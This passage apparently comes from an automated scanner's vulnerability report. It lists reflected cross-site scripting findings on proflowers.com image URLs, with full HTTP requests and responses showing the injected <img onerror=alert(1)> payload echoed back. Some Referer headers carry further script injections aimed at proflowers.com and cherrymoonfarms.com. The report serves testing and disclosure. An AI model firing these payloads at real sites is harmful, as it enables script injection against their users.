GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PFefcc5<img%20src%3da%20onerror%3dalert(1)>06385eca2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/BLB6indaffodills_nestbskt10_2_PFefcc5<img src=a onerror=alert(1)>06385eca2
4.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 98f67<img%20src%3da%20onerror%3dalert(1)>58f8ed190d0 was submitted in the REST URL parameter 9. This input was echoed as 98f67<img src=a onerror=alert(1)>58f8ed190d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF98f67<img%20src%3da%20onerror%3dalert(1)>58f8ed190d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:12 GMT
Connection: close

Unable to find /ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF98f67<img src=a onerror=alert(1)>58f8ed190d0
4.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 48187<img%20src%3da%20onerror%3dalert(1)>f3fd15c3de9 was submitted in the REST URL parameter 9. This input was echoed as 48187<img src=a onerror=alert(1)>f3fd15c3de9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF48187<img%20src%3da%20onerror%3dalert(1)>f3fd15c3de9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:57 GMT
Connection: close

Unable to find /ProvideCommerce/BLB7inhollmix_honeywvn09_PF48187<img src=a onerror=alert(1)>f3fd15c3de9
4.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 21185<img%20src%3da%20onerror%3dalert(1)>f2d54a66470 was submitted in the REST URL parameter 9. This input was echoed as 21185<img src=a onerror=alert(1)>f2d54a66470 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF21185<img%20src%3da%20onerror%3dalert(1)>f2d54a66470?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF21185<img src=a onerror=alert(1)>f2d54a66470
4.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 49976<img%20src%3da%20onerror%3dalert(1)>da2ce43ff53 was submitted in the REST URL parameter 9. This input was echoed as 49976<img src=a onerror=alert(1)>da2ce43ff53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF49976<img%20src%3da%20onerror%3dalert(1)>da2ce43ff53?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:53 GMT
Connection: close

Unable to find /ProvideCommerce/CAReaster_pnk10_PF49976<img src=a onerror=alert(1)>da2ce43ff53
4.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da675<img%20src%3da%20onerror%3dalert(1)>a07aa15604a was submitted in the REST URL parameter 9. This input was echoed as da675<img src=a onerror=alert(1)>a07aa15604a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PFda675<img%20src%3da%20onerror%3dalert(1)>a07aa15604a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:06 GMT
Connection: close

Unable to find /ProvideCommerce/CONT215_BRR10006_MDay_11_PFda675<img src=a onerror=alert(1)>a07aa15604a
4.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ce03a<img%20src%3da%20onerror%3dalert(1)>9d86da2ef7b was submitted in the REST URL parameter 9. This input was echoed as ce03a<img src=a onerror=alert(1)>9d86da2ef7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PFce03a<img%20src%3da%20onerror%3dalert(1)>9d86da2ef7b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:07 GMT
Connection: close

Unable to find /ProvideCommerce/CONTR205_BRR10012_MDay_11_PFce03a<img src=a onerror=alert(1)>9d86da2ef7b
4.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 812a0<img%20src%3da%20onerror%3dalert(1)>961839e23fc was submitted in the REST URL parameter 9. This input was echoed as 812a0<img src=a onerror=alert(1)>961839e23fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ812a0<img%20src%3da%20onerror%3dalert(1)>961839e23fc?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:17 GMT
Connection: close

Unable to find /ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ812a0<img src=a onerror=alert(1)>961839e23fc
4.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f71af<img%20src%3da%20onerror%3dalert(1)>58e4fbecd28 was submitted in the REST URL parameter 9. This input was echoed as f71af<img src=a onerror=alert(1)>58e4fbecd28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tnf71af<img%20src%3da%20onerror%3dalert(1)>58e4fbecd28?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:26 GMT
Connection: close

Unable to find /ProvideCommerce/ContempoVase_tnf71af<img src=a onerror=alert(1)>58e4fbecd28
4.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7d085<img%20src%3da%20onerror%3dalert(1)>7f387170b5 was submitted in the REST URL parameter 9. This input was echoed as 7d085<img src=a onerror=alert(1)>7f387170b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ7d085<img%20src%3da%20onerror%3dalert(1)>7f387170b5?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:22 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ7d085<img src=a onerror=alert(1)>7f387170b5
4.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 28232<img%20src%3da%20onerror%3dalert(1)>694141eb889 was submitted in the REST URL parameter 9. This input was echoed as 28232<img src=a onerror=alert(1)>694141eb889 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF28232<img%20src%3da%20onerror%3dalert(1)>694141eb889?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 133
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:03 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF28232<img src=a onerror=alert(1)>694141eb889
4.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e7337<img%20src%3da%20onerror%3dalert(1)>5e353b6f9c4 was submitted in the REST URL parameter 9. This input was echoed as e7337<img src=a onerror=alert(1)>5e353b6f9c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQe7337<img%20src%3da%20onerror%3dalert(1)>5e353b6f9c4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 133
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:20 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQe7337<img src=a onerror=alert(1)>5e353b6f9c4
4.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ec5f1<img%20src%3da%20onerror%3dalert(1)>20d57e53c2d was submitted in the REST URL parameter 9. This input was echoed as ec5f1<img src=a onerror=alert(1)>20d57e53c2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PFec5f1<img%20src%3da%20onerror%3dalert(1)>20d57e53c2d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:51 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PFec5f1<img src=a onerror=alert(1)>20d57e53c2d
4.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f096f<img%20src%3da%20onerror%3dalert(1)>6fffa73ca86 was submitted in the REST URL parameter 9. This input was echoed as f096f<img src=a onerror=alert(1)>6fffa73ca86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQf096f<img%20src%3da%20onerror%3dalert(1)>6fffa73ca86?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:09 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQf096f<img src=a onerror=alert(1)>6fffa73ca86
4.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ef49c<img%20src%3da%20onerror%3dalert(1)>7e2a3d4dba7 was submitted in the REST URL parameter 9. This input was echoed as ef49c<img src=a onerror=alert(1)>7e2a3d4dba7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PFef49c<img%20src%3da%20onerror%3dalert(1)>7e2a3d4dba7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:04 GMT
Connection: close

Unable to find /ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PFef49c<img src=a onerror=alert(1)>7e2a3d4dba7
4.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 799e8<img%20src%3da%20onerror%3dalert(1)>5150b0f3d58 was submitted in the REST URL parameter 9. This input was echoed as 799e8<img src=a onerror=alert(1)>5150b0f3d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF799e8<img%20src%3da%20onerror%3dalert(1)>5150b0f3d58?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
